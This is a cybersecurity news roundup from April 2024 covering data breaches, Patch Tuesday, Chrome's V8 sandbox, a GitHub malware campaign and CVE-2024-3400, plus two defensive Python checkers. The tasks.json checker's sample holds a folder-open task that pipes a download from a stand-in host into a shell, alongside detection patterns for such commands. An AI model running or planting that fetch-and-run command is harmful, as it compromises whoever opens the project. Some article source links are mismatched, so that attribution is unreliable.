
Friday, April 12th, 2024

Cybersecurity Week in Review (12/04/24)


GHC-SCW: Ransomware gang stole health data of 533,000 people

Non-profit healthcare service provider Group Health Cooperative of South Central Wisconsin (GHC-SCW) has disclosed that a ransomware gang breached its network in January and stole documents containing the personal and medical information of over 500,000 individuals.
However, the attackers couldn’t encrypt the compromised devices, which allowed GHC-SCW to secure its systems with the help of external cyber incident response experts and bring them back online after they were isolated to contain the breach.
“On January 25th, 2024, during the early hours of the morning, GHC-SCW detected unauthorized entry into their network. As a response, the Information Technology (IT) Department intentionally isolated and fortified the network, resulting in temporary unavailability of several systems,” the healthcare organization announced in a press release issued on Tuesday.

Source – https://www.bleepingcomputer.com/news/security/ghc-scw-ransomware-gang-stole-health-data-of-533-000-people/

Google Chrome Adds V8 Sandbox – A New Defense Against Browser Attacks

Google has announced support for what’s called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues.
The sandbox, according to V8 security technical lead Samuel Groß, aims to prevent “memory corruption in V8 from spreading within the host process.”
The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that’s designed to mitigate common V8 vulnerabilities.
The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process’ virtual address space (“the sandbox”) and isolating it from the rest of the process.

Source – https://thehackernews.com/2024/04/google-chrome-adds-v8-sandbox-new.html

340,000 Social Security numbers stolen from US consulting firm

The breach was disclosed on Maine’s government website where data breach notifications affecting residents of the state have to be posted.
GMA filed a notice in February when it first discovered the breach but has only now said that the hackers have illicitly obtained hundreds of thousands of Social Security numbers of their victims.
The firm, which provides economic and litigation services to companies and US government agencies, including the Department of Justice (DOJ), did not specify the type of cyberattack but said it “promptly took steps to mitigate the incident” in the data breach notice it mailed to affected victims.
GMA said: “We consulted third-party cybersecurity experts to aid in managing the situation, and we informed law enforcement and the Department of Justice. It is probable that your personal and Medicare data was impacted by this event.”

Source – https://cybernews.com/news/social-security-numbers-data-breach-gma/

Microsoft April 2024 Patch Tuesday fixes 150 security flaws, 67 RCEs

Today is Microsoft’s April 2024 Patch Tuesday, which includes security updates for 150 flaws and sixty-seven remote code execution bugs.
Only three critical vulnerabilities were fixed as part of today’s Patch Tuesday, but there are over sixty-seven remote code execution bugs. More than half of the RCE flaws are found within Microsoft SQL drivers, likely sharing a common flaw.
There were also fixes for twenty-six Secure Boot bypasses released this month, including two from Lenovo.


The number of bugs in each vulnerability category is listed below:
• 31 Elevation of Privilege Vulnerabilities
• 29 Security Feature Bypass Vulnerabilities
• 67 Remote Code Execution Vulnerabilities
• 13 Information Disclosure Vulnerabilities
• 7 Denial of Service Vulnerabilities
• 3 Spoofing Vulnerabilities

Source – https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2024-patch-tuesday-fixes-150-security-flaws-67-rces/

Canadian online vehicle dealer hit by cyberattack

The online vehicle dealer headquartered in Toronto, Canada, said that an unauthorized party had accessed specific areas of the legacy ABS Auto Auctions infrastructure.
The company took steps to secure the system – which was temporarily rendered inoperable – and launched an investigation into the incident.
The personal information involved includes:
• Dates of birth
• Social Security numbers
• Driver’s licenses
• Bank account numbers
• Bank routing numbers
EBlock has sent the breach notification letter “out of an abundance of caution,” as it is unsure whether its clients’ personal information has been misused for fraudulent activity.

Source – https://thehackernews.com/2024/04/malicious-apps-caught-secretly-turning.html

HALO hacked, private data stolen

According to a report to the Maine Attorney General, the attack happened on November 22nd, 2023. The notice to affected clients on March 28th states that threat actors had accessed HALO’s computer systems and stolen files with private data.
The company mentioned in a statement that “its network’s computer systems were infiltrated by a sophisticated threat actor who utilized methods to avoid detection by their information security defenses.”
Threat actors got their hands on the data provided to HALO Human Resources for tax or benefits purposes, including name, date of birth, and Social Security number.
The report to the Maine Attorney General states that, in total, 7,305 people were affected by the breach.
HALO claims to be working with external cybersecurity experts to investigate the incident and to monitor the Dark Web for data being leaked. The company will also provide credit and identity protection services to affected individuals for 12 months free of charge.
HALO has more than 40 offices worldwide and employs over 1,500 individuals.
The company provides branded merchandise, uniform programs, and employee recognition and incentive solutions.

Source – https://cybernews.com/news/eblock-hit-by-cyberattack/

Beware: GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

Threat actors are now taking advantage of GitHub’s search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that’s designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.
The idea is to manipulate GitHub’s search rankings so that threat actor-controlled repositories appear at the top when users filter and sort results by most recent update, and to inflate their apparent popularity with bogus stars added from fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.

Source – https://thehackernews.com/2024/04/beware-githubs-fake-popularity-scam.html
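Checkmarx’s report says the malicious code sits in Visual Studio Code project files and fetches a next-stage payload from a remote URL. As an added defender-side example (not from the article or from Checkmarx), the Python below assumes the hiding place is a repository’s `.vscode/tasks.json`, where a task can be given `runOptions.runOn: folderOpen` so it executes as soon as the folder is opened, and flags tasks that auto-run or reach out to a remote URL; the regexes and the sample file are constructed for this example.

```python
import json
import re

# Constructed patterns (not Checkmarx's rules): downloader tools, any
# remote URL, and a download piped straight into an interpreter.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b", re.I)
URL_RE = re.compile(r"https?://", re.I)
PIPE_TO_INTERP_RE = re.compile(r"\|\s*(sh|bash|zsh|powershell|pwsh|python3?)\b", re.I)


def _strip_line_comments(text: str) -> str:
    # VS Code tolerates // comments in tasks.json; json.loads does not.
    return re.sub(r"(?m)^\s*//.*$", "", text)


def suspicious_tasks(tasks_json: str) -> list:
    """Return one finding per task that auto-runs on folder open or
    reaches out to a remote URL; an empty list means nothing was flagged."""
    doc = json.loads(_strip_line_comments(tasks_json))
    findings = []
    for task in doc.get("tasks", []):
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        cmd = " ".join(parts)
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs when the folder is opened")
        if FETCH_RE.search(cmd) or URL_RE.search(cmd):
            reasons.append("fetches content from a remote URL")
        if PIPE_TO_INTERP_RE.search(cmd):
            reasons.append("pipes the download into an interpreter")
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"), "reasons": reasons})
    return findings


# Constructed .vscode/tasks.json: one benign build task and one that fetches
# and executes a remote script as soon as the folder is opened.
SAMPLE_TASKS_JSON = """{
  // constructed sample for this example, not a real repository
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://example.invalid/stage2 | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}"""
```

Running `suspicious_tasks(SAMPLE_TASKS_JSON)` flags only the `setup` task, with all three reasons; a repository that passes this check can still be malicious, so treat it as one triage signal alongside star and account-age anomalies.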

French football giant PSG says hackers targeted its ticketing system

According to the club’s letter to the fans, first published by Le Parisien, the incident was detected last week and shared with supporters on Monday.
“Madam, Sir, on April 3rd, the Information Systems Department of Paris Saint-Germain was challenged by unusual access attempts to the club’s ticketing system,” says the letter.
“Our teams detected a vulnerability, which they resolved in less than 24 hours. Additional security measures were immediately implemented.”
PSG says the club promptly informed the CNIL, the data protection authority for France, of the incident. Under the European Union’s data protection laws, the CNIL could fine PSG if the club was found to have been negligent in protecting customers’ data.

Source – https://cybernews.com/news/france-football-psg-cyberattack/

Epilepsy Foundation of Metro NY hit by ransomware attack

The Epilepsy Foundation of Metropolitan New York (EFMNY) is an organization that aims to promote awareness surrounding epilepsy while helping people locate treatment options, support, and resources.
The foundation observed that a cyberattack impacted a part of its network environment, leaving certain systems encrypted.
The attack “resulted in the unauthorized access and/or acquisition of certain files from within the network,” the breach notification letter reads.
The attack follows a typical double-extortion ransomware scenario: criminals first exfiltrate the data and then encrypt it on a victim’s machines, threatening to release the data if the demands aren’t fulfilled.
Cybernews has contacted the organization to see whether they have received a ransom demand and will update the article accordingly.

Source – https://cybernews.com/news/epilepsy-foundation-ransomware-attack/

Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks

Apple on Wednesday revised its documentation pertaining to its mercenary spyware threat notification system to mention that it alerts users when they may have been individually targeted by such attacks.
It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off “individually targeted attacks of such exceptional cost and complexity.”
Apple stated that “while mercenary spyware attacks are directed at a limited number of individuals, including journalists, activists, politicians, and diplomats, they persist worldwide.”
The update marks a change in wording that previously said these “threat notifications” are designed to inform and assist users who may have been targeted by state-sponsored attackers.

Source – https://thehackernews.com/2024/04/apple-expands-spyware-alert-system-to.html

AT&T now says data breach impacted 51 million customers

AT&T is notifying 51 million former and current customers, warning them of a data breach that exposed their personal information on a hacking forum. However, the company has still not disclosed how the data was obtained.
These notifications are related to the recent leak of a massive amount of AT&T customer data on the Breach hacking forums that was offered for sale for $1 million in 2021.
When threat actor ShinyHunters first listed the AT&T data for sale in 2021, the company told BleepingComputer that the collection did not belong to them and that their systems had not been breached.
Last month, when another threat actor known as ‘MajorNelson’ leaked the entire dataset on the hacking forum, AT&T once again told BleepingComputer that the data did not originate from them and their systems were not breached.

Source – https://www.bleepingcomputer.com/news/security/att-now-says-data-breach-impacted-51-million-customers/

Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack

Palo Alto Networks is warning that a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways is being exploited in the wild.

Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.

“A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall,” the company said in an advisory published today.

The flaw impacts the following versions of PAN-OS, with fixes expected to be released on April 14, 2024:

• PAN-OS < 11.1.2-h3
• PAN-OS < 11.0.4-h1
• PAN-OS < 10.2.9-h1

Source – https://thehackernews.com/2024/04/zero-day-alert-critical-palo-alto.html

Critical OS Command Injection in GlobalProtect Gateway

Threat Reports are reports created by Smarttech247 on high- and critical-severity vulnerabilities that have a high potential to be exploited in the wild, i.e. vulnerabilities in products widely used by companies that have no auto-update option, or that are usually not updated automatically because doing so could cause service disruption. A report is usually created as soon as the vulnerability is published, so we strongly recommend that the information is reviewed, tests are performed and patches are applied before the first proof-of-concept is released.
Even though certain vulnerabilities may not have an active exploit in the wild at the time we report on them, we take into consideration the wider risk and the impact they could have on systems should such an exploit become available later. Our duty is to report them on time, and we recommend that enterprises, in order to keep critical business systems protected, allow on average ten working days to check whether or not the new vulnerability affects them and, if so, to implement actions to remove the risk.


Overview
A critical vulnerability, CVE-2024-3400, has been identified in Palo Alto Networks PAN-OS software, specifically affecting versions 10.2, 11.0, and 11.1 with specific GlobalProtect gateway and device telemetry configurations. This flaw could allow an unauthenticated attacker to execute arbitrary code with root privileges on affected firewalls.
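Both the alert above and this report name the same three fixed builds. As an added example (not from Palo Alto Networks or Smarttech247), the Python below parses PAN-OS version strings, including the `-hN` hotfix suffix, and checks a firewall inventory against those builds; the hostnames and builds in the sample inventory are constructed, and the GlobalProtect gateway and device telemetry configuration conditions from the advisory are not modelled, so a flagged build still needs its configuration checked.

```python
import re
from typing import NamedTuple, Optional

# Fixed builds named on this page for CVE-2024-3400 (constructed table):
# any build on the same major.minor train below the listed one is affected.
FIXED_BUILDS = {(11, 1): "11.1.2-h3", (11, 0): "11.0.4-h1", (10, 2): "10.2.9-h1"}
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


class PanOsVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    hotfix: int  # 0 when the string carries no -hN suffix


def parse_version(text: str) -> PanOsVersion:
    """Parse '10.2.9' or '10.2.9-h1'. A base release sorts below its own
    hotfixes, which plain tuple comparison gives us for free."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a PAN-OS version: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return PanOsVersion(int(major), int(minor), int(patch), int(hotfix or 0))


def fixed_build_for(version: PanOsVersion) -> Optional[PanOsVersion]:
    """Fixed build for the version's release train, or None when the train
    is not one of the three the page lists."""
    fixed = FIXED_BUILDS.get((version.major, version.minor))
    return parse_version(fixed) if fixed else None


def is_vulnerable_version(text: str) -> bool:
    """True when the train is listed and the build predates its fix."""
    v = parse_version(text)
    fixed = fixed_build_for(v)
    return fixed is not None and v < fixed


def triage(inventory: dict) -> list:
    """Names of firewalls whose PAN-OS build still needs the fix, sorted."""
    return sorted(n for n, ver in inventory.items() if is_vulnerable_version(ver))


# Constructed inventory (hostnames and builds invented for this example).
SAMPLE_INVENTORY = {
    "fw-dc1": "11.1.2-h2",   # below 11.1.2-h3 -> vulnerable
    "fw-dc2": "11.1.2-h3",   # the fixed build itself
    "fw-edge": "10.2.9",     # base release, below 10.2.9-h1 -> vulnerable
    "fw-lab": "10.1.11-h4",  # train not listed on the page -> not flagged
    "fw-hq": "11.0.5",       # later patch release than 11.0.4-h1
}
```

`triage(SAMPLE_INVENTORY)` returns `['fw-dc1', 'fw-edge']`; note that a bare release such as `10.2.9` is correctly treated as older than its `-h1` hotfix, which a naive string comparison would get wrong.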

Full Report – https://resource.smarttech247.com/hubfs/2024_Reports/Critical_OS_Command_Injection_in_GlobalProtect_Gateway.pdf

